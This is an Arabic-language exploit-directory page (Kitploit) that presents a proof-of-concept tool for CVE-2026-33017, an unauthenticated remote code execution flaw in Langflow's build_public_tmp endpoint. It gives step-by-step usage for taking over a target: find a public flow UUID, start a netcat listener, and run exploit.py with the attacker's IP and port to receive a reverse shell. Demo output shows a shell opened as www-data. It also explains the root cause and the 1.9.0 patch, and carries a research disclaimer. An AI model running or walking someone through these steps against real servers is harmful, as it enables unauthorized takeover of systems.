Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33017 — إثبات مفهوم للاستغلال (PoC) لـ CVE-2026-33017: تنفيذ رمز عن بعد غير مصادق عليه في Langflow من خلال حقن مكون مخصص خبيث بلغة Python، مع مستمع شل عكسي مدمج. | Kitploit
أدوات/GitHubGitHub/dynamo2k1/cve-2026-33017
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubdynamo2k1/cve-2026-33017

CVE-2026-33017

إثبات مفهوم للاستغلال (PoC) لـ CVE-2026-33017: تنفيذ رمز عن بعد غير مصادق عليه في Langflow من خلال حقن مكون مخصص خبيث بلغة Python، مع مستمع شل عكسي مدمج.

عرض المستودع
4منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33017 — تنفيذ الأوامر عن بُعد غير المصادق عليه في Langflow

المؤلف: dynamo2k1
الشدة: حرجة
CVSSv3: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


نظرة عامة

CVE-2026-33017 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد غير المصادق عليه في Langflow، وهي منصة مفتوحة المصدر لبناء تطبيقات LLM وسير عمل الذكاء الاصطناعي بصريًا.

يقبل نقطة النهاية الضعيفة build_public_tmp حقل بيانات data يقدمه المهاجم في جسم الطلب دون مصادقة. يتيح ذلك للمهاجم حقن تعريف تدفق مخصص بالكامل يحتوي على مكون مخصص خبيث بلغة Python، يتم تنفيذ كوده على الخادم أثناء عملية البناء.

لا حاجة لبيانات اعتماد. فقط UUID تدفق عام صالح مطلوب.


الإصدارات المتأثرة

الحالةالإصدار
ضعيفLangflow < 1.9.0
مصححLangflow 1.9.0+

نقطة النهاية الضعيفة

root@kitploit:~
POST /api/v1/build_public_tmp/{flow_id}/flow

صُممت نقطة النهاية هذه لبناء التدفقات العامة (المشاركة) دون مصادقة. في الإصدارات الضعيفة، تقبل أيضًا حقل بيانات data يتحكم به المهاجم في جسم الطلب، والذي يُمرر مباشرة إلى منطق البناء من جانب الخادم — بما في ذلك أي كود Python مضمن في المكونات المخصصة.


الاستخدام

المتطلبات الأساسية

root@kitploit:~
pip install requests urllib3

الخطوة 1 — العثور على UUID تدفق عام

تصفح مثيل Langflow المستهدف وابحث عن تدفق مشترك/عام. يظهر UUID في الرابط:

root@kitploit:~
https://target.com/playground/7d84d636-af65-42e4-ac38-26e867052c25
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                        هذا هو معرف التدفق

الخطوة 2 — إعداد مستمع

root@kitploit:~
nc -lvnp 9001

الخطوة 3 — تشغيل الأداة الاستغلالية

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001

أو استخدم المستمع التفاعلي المدمج (بدون حاجة لـ nc منفصل):

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001 \
  --listen

الخيارات

العلمالوصف
--urlرابط قاعدة Langflow الهدف
--flow-idUUID التدفق العام
--lhostعنوان IP الخاص بك لاستقبال اتصال الصدفة العكسية
--lportمنفذ المستمع الخاص بك
--listenاستخدام معالج الصدفة المدمج بدلاً من nc الخارجي
--timeoutمهلة طلب HTTP بالثواني (الافتراضي: 30)

عرض توضيحي

root@kitploit:~
[*] Target: https://target.com/api/v1/build_public_tmp/<flow-id>/flow
[*] Callback: 10.10.15.28:9001
[*] HTTP 200
[!] SHELL ESTABLISHED FROM 10.x.x.x:36522

www-data@target:/var/lib/langflow$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

كيف يعمل

  1. يحدد المهاجم UUID تدفق Langflow عام (مرئي في رابط الملعب).
  2. يؤدي طلب POST معدّل إلى حقن مكون مخصص ضار يحتوي على كود Python على مستوى الوحدة.
  3. أثناء مرحلة البناء، يقوم Langflow بتجميع كود المكون — لتنفيذ حمولة المهاجم قبل استدعاء أي طريقة.
  4. ينتج الكود صدفة عكسية تعود إلى مستمع المهاجم.

السبب الجذري: وثقت build_public_tmp في حقل data من جسم الطلب بدلاً من استخدام تعريف التدفق المخزن على الخادم فقط.

التصحيح: في Langflow 1.9.0، تمت إزالة معامل data من build_public_tmp. لم يعد من الممكن حقن تعريفات التدفق الخارجية من خلال هذه النقطة الطرفية.

تأكيد التصحيح: 73b6612


المراجع

  • نشرة أمان GitHub — GHSA-vwmf-pq79-vjvx
  • NVD — CVE-2026-33017
  • تأكيد التصحيح

إخلاء مسؤولية

تم تقديم هذا الإثبات العملي (PoC) لأغراض تعليمية وبحث أمني مصرح به فقط. يُستخدم فقط ضد الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها.

تنزيل الأداة